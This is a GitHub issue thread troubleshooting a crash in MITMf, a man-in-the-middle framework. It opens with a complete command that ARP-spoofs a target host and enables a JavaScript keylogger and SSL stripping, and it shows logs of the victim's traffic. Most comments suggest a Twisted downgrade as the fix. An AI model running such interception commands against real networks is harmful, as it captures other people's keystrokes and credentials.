### ISSUE TITLE
error when turn on jskeylog

### ISSUE THREAD

**Issue by thanh125643** [byt3bl33d3r/MITMf#316]
mitmf -i wlan0 --spoof --arp --gateway 192.168.100.1 --targets 192.168.100.6 --jskeylogger --hsts --upsidedownternet --log-level info

███╗   ███╗██╗████████╗███╗   ███╗███████╗
████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝
██╔████╔██║██║   ██║   ██╔████╔██║█████╗  
██║╚██╔╝██║██║   ██║   ██║╚██╔╝██║██╔══╝  
██║ ╚═╝ ██║██║   ██║   ██║ ╚═╝ ██║██║     
╚═╝     ╚═╝╚═╝   ╚═╝   ╚═╝     ╚═╝╚═╝     

[*] MITMf v0.9.8 - 'The Dark Side'
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ JSKeylogger v0.2
|_ Upsidedownternet v0.1
|_ SSLstrip+ v0.4
|  |_ SSLstrip+ by Leonardo Nve running
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ Net-Creds v1.0 online
|_ MITMf-API online
|_ HTTP server online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ DNSChef v0.4 online
|_ SMB server online

2016-06-12 00:11:56 192.168.100.6 [type:IE-8 os:Windows 7] www.msn.com
2016-06-12 00:11:57 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
2016-06-12 00:11:58 192.168.100.6 [type:IE-8 os:Windows 7] static-hp-eas-s-msn-com.akamaized.net
2016-06-12 00:11:58 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
2016-06-12 00:11:58 192.168.100.6 [type:IE-8 os:Windows 7] static-hp-eas-s-msn-com.akamaized.net
2016-06-12 00:11:58 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
2016-06-12 00:11:59 192.168.100.6 [type:IE-8 os:Windows 7] ib.adnxs.com
2016-06-12 00:12:00 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']

**Comment by dz-ghost** [comment]
try this library : [ pip install Twisted==15.5.0 ] it's work with me {good look}

**Comment by byt3bl33d3r** [comment]
Are you using the version from github? I'm pretty sure this was fixed

**Comment by KALRONG** [comment]
I had the same issue but dz-ghost solution worked just fine :D

**Comment by NFulkerson** [comment]
@byt3bl33d3r I've tried both the version of MITMf in the Kali repositories as well as straight from Github (with a virtualenvwrapper), and both seem to be affected by this issue. Output from pip:
`
asn1crypto (0.22.0)
attrs (17.2.0)
Automat (0.6.0)
beautifulsoup4 (4.6.0)
capstone (3.0.4)
certifi (2017.7.27.1)
cffi (1.10.0)
chardet (3.0.4)
click (6.7)
configobj (5.0.6)
constantly (15.1.0)
cryptography (2.0.3)
dnslib (0.9.7)
dnspython (1.15.0)
enum34 (1.1.6)
Flask (0.12.2)
future (0.16.0)
hyperlink (17.3.0)
idna (2.6)
incremental (17.5.0)
ipaddress (1.0.18)
IPy (0.83)
itsdangerous (0.24)
Jinja2 (2.9.6)
lxml (3.8.0)
MarkupSafe (1.0)
msgpack-python (0.4.8)
netaddr (0.7.19)
NetfilterQueue (0.8.1)
olefile (0.44)
pefile (2017.8.1)
Pillow (4.2.1)
pip (9.0.1)
pyasn1 (0.3.2)
pyasn1-modules (0.0.11)
pycparser (2.18)
pycrypto (2.6.1)
pyinotify (0.9.6)
pyOpenSSL (17.2.0)
pypcap (1.1.6)
python-magic (0.4.13)
requests (2.18.4)
scapy (2.3.3)
service-identity (17.0.0)
setuptools (36.2.7)
six (1.10.0)
Twisted (17.5.0)
ua-parser (0.7.3)
urllib3 (1.22)
user-agents (1.1.0)
Werkzeug (0.12.2)
wheel (0.29.0)
zope.interface (4.4.2)
`
Error:
`
2017-08-16 12:22:07 [ProxyPlugins] hooking handleEndHeaders()
Unhandled Error
Traceback (most recent call last):
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
    why = selectable.doRead()
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 208, in doRead
    return self._dataReceived(data)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 214, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/protocols/basic.py", line 571, in dataReceived
    why = self.lineReceived(line)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/web/http.py", line 570, in lineReceived
    self.handleEndHeaders()
  File "/usr/var/MITMf/core/sslstrip/ServerConnection.py", line 182, in handleEndHeaders
    for header, value in self.client.headers.iteritems():
exceptions.AttributeError: ClientRequest instance has no attribute 'headers'
`

**Comment by jaimbuko** [comment]
thanks dz-ghost; this line worked! :)

**Comment by gustavobica** [comment]
For me the problem was that I had Twisted in the 17.0.0 version, using the solution from dz-ghost solved the problem. Thanks!

**Comment by mironetwo12** [comment]
thanks dz-ghost; this line worked! :) 

YES!
